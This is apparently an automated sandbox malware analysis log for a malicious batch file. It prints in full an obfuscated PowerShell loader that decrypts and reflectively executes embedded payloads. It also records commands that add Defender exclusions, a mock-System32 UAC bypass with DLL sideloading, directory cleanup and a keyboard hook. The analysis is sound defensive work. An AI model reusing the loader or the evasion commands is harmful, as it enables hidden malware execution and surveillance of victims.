Source: edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C878000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C878000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C8AD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1751775240.0000018224113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1765457198.0000018233DBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1765457198.0000018233EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1751775240.0000018223D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1807481747.000001BE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.1751775240.0000018225361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1751775240.0000018223D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1807481747.000001BE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C922000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C922000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000005.00000002.1807481747.000001BE80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1751775240.0000018224C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1768282215.000001823BEF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000004.00000002.1765457198.0000018233DBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1751775240.0000018225A3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1751775240.0000018224015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1765457198.0000018233EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1852505042.000001BE90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000F.00000003.1901721874.000002494C922000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000004.00000002.1751775240.0000018225361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.1751775240.0000018225361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49742 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 6360, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\MLANG.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\ComputerDefaults.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\MLANG.dllJump to dropped file
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D6039C4 NtQueryWnfStateData,GetModuleHandleW,GetProcAddress,10_2_00007FF64D6039C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\ComputerDefaults.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\MLANG.dllJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows \System32\MLANG.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B6E004_2_00007FFD9B8B6E00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BCA904_2_00007FFD9B8BCA90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BCA354_2_00007FFD9B8BCA35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BC93B4_2_00007FFD9B8BC93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B60454_2_00007FFD9B8B6045
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BDCE04_2_00007FFD9B8BDCE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8CDCA04_2_00007FFD9B8CDCA0
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D608A6410_2_00007FF64D608A64
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D608F5C10_2_00007FF64D608F5C
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D607B2C10_2_00007FF64D607B2C
Source: C:\Windows \System32\ComputerDefaults.exeCode function: 10_2_00007FF64D603B2810_2_00007FF64D603B28
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MLANG.dll 53493EDDDF3E4509F791D0E26EA80D8B2283AA95A0F4E263EBB8FC1E7D8D9C82
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2240
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2240Jump to behavior
Source: Process Memory Space: powershell.exe PID: 6360, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 600, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.spyw.evad.winCMD@23/24@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\223694e0-c20b-492e-8b54-5934c96afd76
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj1vbbj1.xew.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SC.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\ComputerDefaults.exe "C:\Windows \System32\ComputerDefaults.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){ IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle = $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU')) { $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /qJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\ComputerDefaults.exe "C:\Windows \System32\ComputerDefaults.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
